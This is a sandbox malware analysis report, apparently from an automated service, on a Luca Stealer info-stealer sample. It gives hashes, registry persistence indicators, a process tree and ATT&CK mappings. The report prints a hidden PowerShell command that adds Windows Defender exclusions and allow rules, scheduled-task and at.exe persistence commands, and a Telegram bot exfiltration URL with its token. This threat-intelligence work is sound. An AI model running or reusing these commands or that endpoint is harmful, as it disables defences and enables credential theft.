lucastealer | 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0

Analysis

max time kernel
150s
max time network
142s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
05-07-2024 22:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
Size

4.5MB
MD5

b07543ce10033160a338e01933cb8b86
SHA1

30b8d4fd6864e3a056c1d57320efff1bb89c2228
SHA256

65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0
SHA512

26389076fddf72f5318065b2f6112a7973b059a449160cf974adf3ff3b883a3f2dd154eb472c0b02d6b2ddd9f0f76799bfebc969944fe9ae678fb849c32dd716
SSDEEP

98304:zXtrbTA1+sVDTXLW6jRhdGVQguhhW31ZO:z9c1+0zL5LdGVzu+lE

Score

10^/10

lucastealer evasion execution persistence stealer

Malware Config

Extracted

Family

lucastealer

https://api.telegram.org/bot6068798932:AAG_cHiqinDwNZ3Hd-rdp8tPwbT0czdVwTw

Signatures

Luca Stealer
Info stealer written in Rust first seen in July 2022.
stealer lucastealer

Modifies WinLogon for persistence 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

explorer.exesvchost.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "C:\\Windows\\explorer.exe, c:\\windows\\system\\explorer.exe"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "C:\\Windows\\explorer.exe, c:\\windows\\system\\explorer.exe"	svchost.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Processes:

explorer.exesvchost.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	svchost.exe

Boot or Logon Autostart Execution: Active Setup 2 TTPs 8 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

Processes:

svchost.exeexplorer.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\mrsys.exe MR"	svchost.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999}	svchost.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\mrsys.exe MR"	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999}	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\mrsys.exe MR"	svchost.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}	svchost.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}	svchost.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

1008 powershell.exe
1008 powershell.exe

pid	process
1008	powershell.exe
1008	powershell.exe

Drops startup file 1 IoCs

Processes:

65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PWNHLD.lnk	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe

Executes dropped EXE 9 IoCs

Processes:

65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe icsys.icn.exeexplorer.exespoolsv.exeUVLZVA.exesvchost.exeuvlzva.exe icsys.icn.exespoolsv.exe

pid	process
2932	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
2464	icsys.icn.exe
2104	explorer.exe
2784	spoolsv.exe
2820	UVLZVA.exe
2000	svchost.exe
1668	uvlzva.exe
2772	icsys.icn.exe
736	spoolsv.exe

Loads dropped DLL 19 IoCs

Processes:

65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exeicsys.icn.exeexplorer.exe65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe spoolsv.exeUVLZVA.exesvchost.exe

pid	process
1220	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
1220	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
1220	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
2464	icsys.icn.exe
2464	icsys.icn.exe
2104	explorer.exe
2104	explorer.exe
2932	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
2932	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
2932	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
2932	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
2932	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
2784	spoolsv.exe
2784	spoolsv.exe
2820	UVLZVA.exe
2820	UVLZVA.exe
2820	UVLZVA.exe
2000	svchost.exe
2000	svchost.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

explorer.exesvchost.exe65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\system\\explorer.exe RO"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\system\\svchost.exe RO"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\system\\explorer.exe RO"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\system\\svchost.exe RO"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Run\PWNHLD = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windata\\Microsoft Office Click-to-Run.exe\""	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe	autoit_exe

Drops file in Windows directory 6 IoCs

Processes:

icsys.icn.exeexplorer.exespoolsv.exesvchost.exe

description	ioc	process
File opened for modification	\??\c:\windows\system\explorer.exe	icsys.icn.exe
File opened for modification	\??\c:\windows\system\spoolsv.exe	explorer.exe
File opened for modification	\??\c:\windows\system\svchost.exe	spoolsv.exe
File opened for modification	\??\c:\windows\system\explorer.exe	explorer.exe
File opened for modification	\??\c:\windows\system\svchost.exe	svchost.exe
File opened for modification	C:\Windows\system\udsys.exe	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

2604 schtasks.exe

pid	process
2604	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

icsys.icn.exe65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe powershell.exeexplorer.exesvchost.exe

pid	process
2464	icsys.icn.exe
2932	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
1008	powershell.exe
2104	explorer.exe
2104	explorer.exe
2104	explorer.exe
2104	explorer.exe
2000	svchost.exe
2000	svchost.exe
2104	explorer.exe
2000	svchost.exe
2000	svchost.exe
2104	explorer.exe
2104	explorer.exe
2000	svchost.exe
2104	explorer.exe
2000	svchost.exe
2104	explorer.exe
2000	svchost.exe
2104	explorer.exe
2000	svchost.exe
2104	explorer.exe
2000	svchost.exe
2104	explorer.exe
2000	svchost.exe
2104	explorer.exe
2000	svchost.exe
2000	svchost.exe
2104	explorer.exe
2000	svchost.exe
2104	explorer.exe
2000	svchost.exe
2104	explorer.exe
2104	explorer.exe
2000	svchost.exe
2104	explorer.exe
2000	svchost.exe
2104	explorer.exe
2000	svchost.exe
2000	svchost.exe
2104	explorer.exe
2104	explorer.exe
2000	svchost.exe
2000	svchost.exe
2104	explorer.exe
2104	explorer.exe
2000	svchost.exe
2000	svchost.exe
2104	explorer.exe
2000	svchost.exe
2104	explorer.exe
2104	explorer.exe
2000	svchost.exe
2104	explorer.exe
2000	svchost.exe
2000	svchost.exe
2104	explorer.exe
2000	svchost.exe
2104	explorer.exe
2000	svchost.exe
2104	explorer.exe
2000	svchost.exe
2104	explorer.exe
2000	svchost.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

Processes:

65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe explorer.exesvchost.exe

pid process

2932 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
2104 explorer.exe
2000 svchost.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1008 powershell.exe

description	pid	process
Token: SeDebugPrivilege	1008	powershell.exe

Suspicious use of SetWindowsHookEx 18 IoCs

Processes:

65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exeicsys.icn.exeexplorer.exespoolsv.exesvchost.exeUVLZVA.exeicsys.icn.exespoolsv.exe

pid	process
1220	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
1220	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
2464	icsys.icn.exe
2464	icsys.icn.exe
2104	explorer.exe
2104	explorer.exe
2784	spoolsv.exe
2784	spoolsv.exe
2000	svchost.exe
2820	UVLZVA.exe
2820	UVLZVA.exe
2772	icsys.icn.exe
2772	icsys.icn.exe
2000	svchost.exe
736	spoolsv.exe
736	spoolsv.exe
2104	explorer.exe
2104	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exeicsys.icn.exeexplorer.exe65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe spoolsv.execmd.exeUVLZVA.execmd.exesvchost.exe

description	pid	process	target process
PID 1220 wrote to memory of 2932	1220	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
PID 1220 wrote to memory of 2932	1220	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
PID 1220 wrote to memory of 2932	1220	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
PID 1220 wrote to memory of 2932	1220	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
PID 1220 wrote to memory of 2464	1220	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe	icsys.icn.exe
PID 1220 wrote to memory of 2464	1220	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe	icsys.icn.exe
PID 1220 wrote to memory of 2464	1220	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe	icsys.icn.exe
PID 1220 wrote to memory of 2464	1220	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe	icsys.icn.exe
PID 2464 wrote to memory of 2104	2464	icsys.icn.exe	explorer.exe
PID 2464 wrote to memory of 2104	2464	icsys.icn.exe	explorer.exe
PID 2464 wrote to memory of 2104	2464	icsys.icn.exe	explorer.exe
PID 2464 wrote to memory of 2104	2464	icsys.icn.exe	explorer.exe
PID 2104 wrote to memory of 2784	2104	explorer.exe	spoolsv.exe
PID 2104 wrote to memory of 2784	2104	explorer.exe	spoolsv.exe
PID 2104 wrote to memory of 2784	2104	explorer.exe	spoolsv.exe
PID 2104 wrote to memory of 2784	2104	explorer.exe	spoolsv.exe
PID 2932 wrote to memory of 2820	2932	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe	UVLZVA.exe
PID 2932 wrote to memory of 2820	2932	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe	UVLZVA.exe
PID 2932 wrote to memory of 2820	2932	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe	UVLZVA.exe
PID 2932 wrote to memory of 2820	2932	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe	UVLZVA.exe
PID 2932 wrote to memory of 2552	2932	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe	cmd.exe
PID 2932 wrote to memory of 2552	2932	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe	cmd.exe
PID 2932 wrote to memory of 2552	2932	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe	cmd.exe
PID 2932 wrote to memory of 2552	2932	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe	cmd.exe
PID 2784 wrote to memory of 2000	2784	spoolsv.exe	svchost.exe
PID 2784 wrote to memory of 2000	2784	spoolsv.exe	svchost.exe
PID 2784 wrote to memory of 2000	2784	spoolsv.exe	svchost.exe
PID 2784 wrote to memory of 2000	2784	spoolsv.exe	svchost.exe
PID 2552 wrote to memory of 756	2552	cmd.exe	reg.exe
PID 2552 wrote to memory of 756	2552	cmd.exe	reg.exe
PID 2552 wrote to memory of 756	2552	cmd.exe	reg.exe
PID 2552 wrote to memory of 756	2552	cmd.exe	reg.exe
PID 2820 wrote to memory of 1668	2820	UVLZVA.exe	uvlzva.exe
PID 2820 wrote to memory of 1668	2820	UVLZVA.exe	uvlzva.exe
PID 2820 wrote to memory of 1668	2820	UVLZVA.exe	uvlzva.exe
PID 2820 wrote to memory of 1668	2820	UVLZVA.exe	uvlzva.exe
PID 2552 wrote to memory of 1008	2552	cmd.exe	powershell.exe
PID 2552 wrote to memory of 1008	2552	cmd.exe	powershell.exe
PID 2552 wrote to memory of 1008	2552	cmd.exe	powershell.exe
PID 2552 wrote to memory of 1008	2552	cmd.exe	powershell.exe
PID 2552 wrote to memory of 2272	2552	cmd.exe	reg.exe
PID 2552 wrote to memory of 2272	2552	cmd.exe	reg.exe
PID 2552 wrote to memory of 2272	2552	cmd.exe	reg.exe
PID 2552 wrote to memory of 2272	2552	cmd.exe	reg.exe
PID 2820 wrote to memory of 2772	2820	UVLZVA.exe	icsys.icn.exe
PID 2820 wrote to memory of 2772	2820	UVLZVA.exe	icsys.icn.exe
PID 2820 wrote to memory of 2772	2820	UVLZVA.exe	icsys.icn.exe
PID 2820 wrote to memory of 2772	2820	UVLZVA.exe	icsys.icn.exe
PID 2932 wrote to memory of 2356	2932	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe	cmd.exe
PID 2932 wrote to memory of 2356	2932	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe	cmd.exe
PID 2932 wrote to memory of 2356	2932	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe	cmd.exe
PID 2932 wrote to memory of 2356	2932	65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe	cmd.exe
PID 2356 wrote to memory of 2604	2356	cmd.exe	schtasks.exe
PID 2356 wrote to memory of 2604	2356	cmd.exe	schtasks.exe
PID 2356 wrote to memory of 2604	2356	cmd.exe	schtasks.exe
PID 2356 wrote to memory of 2604	2356	cmd.exe	schtasks.exe
PID 2000 wrote to memory of 736	2000	svchost.exe	spoolsv.exe
PID 2000 wrote to memory of 736	2000	svchost.exe	spoolsv.exe
PID 2000 wrote to memory of 736	2000	svchost.exe	spoolsv.exe
PID 2000 wrote to memory of 736	2000	svchost.exe	spoolsv.exe
PID 2000 wrote to memory of 1688	2000	svchost.exe	at.exe
PID 2000 wrote to memory of 1688	2000	svchost.exe	at.exe
PID 2000 wrote to memory of 1688	2000	svchost.exe	at.exe
PID 2000 wrote to memory of 1688	2000	svchost.exe	at.exe

C:\Users\Admin\AppData\Local\Temp\65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
"C:\Users\Admin\AppData\Local\Temp\65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe"
1⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1220
- \??\c:\users\admin\appdata\local\temp\65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
  c:\users\admin\appdata\local\temp\65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of WriteProcessMemory
  PID:2932
- - C:\Users\Admin\AppData\Local\Temp\UVLZVA.exe
    "C:\Users\Admin\AppData\Local\Temp\UVLZVA.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2820
  - - \??\c:\users\admin\appdata\local\temp\uvlzva.exe
      c:\users\admin\appdata\local\temp\uvlzva.exe
      4⤵
      Executes dropped EXE
      PID:1668
  - - C:\Users\Admin\AppData\Local\icsys.icn.exe
      C:\Users\Admin\AppData\Local\icsys.icn.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:2772
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\BVSURZ.cmd" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2552
  - - C:\Windows\SysWOW64\reg.exe
      reg query "HKU\S-1-5-19\Environment"
      4⤵
      PID:756
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Powershell -nologo -noninteractive -windowStyle hidden -noprofile -command $First = "Add-MpPreference -ThreatIDDefaultAction_Ids "; $Third = " -ThreatIDDefaultAction_Actions Allow -Force"; $ListID = 2147685180, 2147735507, 2147736914, 2147743522, 2147734094, 2147743421, 251873, 213927, 2147722906, 2147748160; ForEach ($ID in $ListID) { Invoke-Expression ($First + $ID + $Third) }; $ListPath = "C:\Windows\KMSAutoS", "C:\Windows\System32\SppExtComObjHook.dll", "C:\Windows\System32\SppExtComObjPatcher.exe", "C:\Windows\AAct_Tools", "C:\Windows\AAct_Tools\AAct_x64.exe", "C:\Windows\AAct_Tools\AAct_files\KMSSS.exe", "C:\Windows\AAct_Tools\AAct_files", "C:\Windows\KMS"; $First = "Add-MpPreference -ExclusionPath "; $Third = "-Force"; ForEach ($Path in $ListPath) { Invoke-Expression ($First + $Path + $Third) }; :Admin
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1008
  - - C:\Windows\SysWOW64\reg.exe
      reg query "HKU\S-1-5-19\Environment"
      4⤵
      PID:2272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks /create /tn PWNHLD.exe /tr C:\Users\Admin\AppData\Roaming\Windata\Microsoft Office Click-to-Run.exe /sc minute /mo 1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2356
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn PWNHLD.exe /tr C:\Users\Admin\AppData\Roaming\Windata\Microsoft Office Click-to-Run.exe /sc minute /mo 1
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2604
- C:\Users\Admin\AppData\Local\icsys.icn.exe
  C:\Users\Admin\AppData\Local\icsys.icn.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2464
- - \??\c:\windows\system\explorer.exe
    c:\windows\system\explorer.exe
    3⤵
    - Modifies WinLogon for persistence
    - Modifies visiblity of hidden/system files in Explorer
    - Boot or Logon Autostart Execution: Active Setup
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2104
  - - \??\c:\windows\system\spoolsv.exe
      c:\windows\system\spoolsv.exe SE
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2784
    - - \??\c:\windows\system\svchost.exe
        
        c:\windows\system\svchost.exe
        5⤵
        Modifies WinLogon for persistence
        Modifies visiblity of hidden/system files in Explorer
        Boot or Logon Autostart Execution: Active Setup
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2000
      - \??\c:\windows\system\spoolsv.exe
        
        c:\windows\system\spoolsv.exe PR
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:736
      - C:\Windows\SysWOW64\at.exe
        
        at 22:28 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
        6⤵
        
        PID:1688
      - C:\Windows\SysWOW64\at.exe
        
        at 22:29 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
        6⤵
        
        PID:2080
      - C:\Windows\SysWOW64\at.exe
        
        at 22:30 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
        6⤵
        
        PID:2856

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\BVSURZ.cmd

Filesize
1KB

MD5
15a1fe3d0f342bdd3232253c7810a05d

SHA1
b658e0d903b37bf12e8e640bece22f235552dc50

SHA256
4070dcb09b69ef57160fae0be5ee3664e39170eeacc46e6f50a080493552b338

SHA512
1961fc65a839c55806162a197385859cfe3a24551ab9b7e0121166eac5e5ae1a4a0d9180229d0ea0240dccb770e4c2d508577e60988c9271bb11f94de1897a35

Download Submit
C:\Users\Admin\AppData\Local\Temp\uvlzva.exe

Filesize
5.7MB

MD5
2c2055233260e5bb20ce675afd39ed0d

SHA1
26c056ba8e99a3fb523612b422a85be3ecbbd5b3

SHA256
306827f0ef0a4cbecd5458776244bf7ee99f2e49569daf0034176b39f5d1c17d

SHA512
3e2a18cd0c7fe5e3529d37ac37b352f8c19d3fef947f117701bb712c19cb40ff3ed56c843c789334a6c93382deef1f5cf4a48fbadb6b1e46fe804b9430fa1546

Download Submit
C:\Users\Admin\AppData\Roaming\mrsys.exe

Filesize
206KB

MD5
299e066e83bcdd17eeb971a43d6fb73c

SHA1
b05f656ab74d3d716a932f733d294f6a65148aca

SHA256
f4f3d32b28fe4933016db35869216c344dbe76d5dd5b532917a12a27f862b7fa

SHA512
43bbbadc2b47f5ffeed4abd40fb1dee1af21118f7a9c7540cd8427f506326c30a94d5ac31208286613d20c553c714b9d70ef0401be44cc9529dda7e40431b8b3

Download Submit
\Users\Admin\AppData\Local\Temp\65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe

Filesize
4.3MB

MD5
1c548cff5a0fbce841e13c9f788793d0

SHA1
55c2d9f23a5cea3ae4b8f629f968369b171d1af8

SHA256
a75a3cc0efa0b8015ce6ad54c3b55783dcbea82507aafcd0dcb0302c6e66d61e

SHA512
332dff21acd741f7b64f104a4f8d20fb5a52ee3fba6b3b2f1080ab4a97523e264f252c0310ae71600295b3f604379c8887640132c3372f7751a67c8ac9ba6f36

Download Submit
\Users\Admin\AppData\Local\Temp\UVLZVA.exe

Filesize
5.9MB

MD5
021079dc0918b9c7359e93e770678000

SHA1
70c03da6f7b339340b1943f5d0b7b1fd87579adf

SHA256
ee63e26e84d8092fda9e527f7db34777b6261d8dfc96ed42167383f88cf1c487

SHA512
9bc14753e39f2c93737886439d64a458f08265d1d8176c233a8e3f864e1f4f2751b161aa22408618d0dd343fb88b7037c8c2eee898c6d9b3bf466aaea709c5b0

Download Submit
\Users\Admin\AppData\Local\icsys.icn.exe

Filesize
207KB

MD5
48a26cf1587666ce901401c65575a7bd

SHA1
416738612e20c2b245d6c410def49f8bd2478c86

SHA256
c5aba06a9ed1291191b9888ad75a51048f5eba7e56387182325653e37bea0945

SHA512
f15639ef35b6e95dea6096c8abf81db55528ca7246d168c1694af284090f839fd3431d9b97887e78d754bcb3a81f8fe613a14c8e5b3e95edfd3dc5b5b076a7cb

Download Submit
\Windows\system\explorer.exe

Filesize
206KB

MD5
71acc17d00bac4a3103092d525f5a10a

SHA1
0f9036f9f318ab0a8708e7b373f81193964b00f2

SHA256
73b1078d16ef80645e7641df5d7f24311e7eef11a6293f1e214656e409aad99d

SHA512
9389161325037984853364ca3b3e020ea912f007d3495a77b358b8dd85b3db78d7f24db45e8d847dff8f20b0427888485c3fc393ff2e548057256a06bae346b5

Download Submit
\Windows\system\spoolsv.exe

Filesize
206KB

MD5
27bba08c021bc8d8fcaf558bd6e6b2d5

SHA1
a3bd0821cc3e48476fd8033431991f536146157d

SHA256
a44882b225e96944c7ce8c208293f8984b9ac9cb72bf71929f0103a5faff9f79

SHA512
89d6711fa0cac5d085f59d57ae66bfdf09bf13b0be35a19be3d2f220a05e740ea0b2e47402e2b540b95cf3763d9e94270b8dd7cb1fb7a6c04e048caae67a8db7

Download Submit
\Windows\system\svchost.exe

Filesize
206KB

MD5
0c3f480898f067a858a2261f39011fe4

SHA1
080a52bbb32dbeb0a688462661b5c8f90d277bfe

SHA256
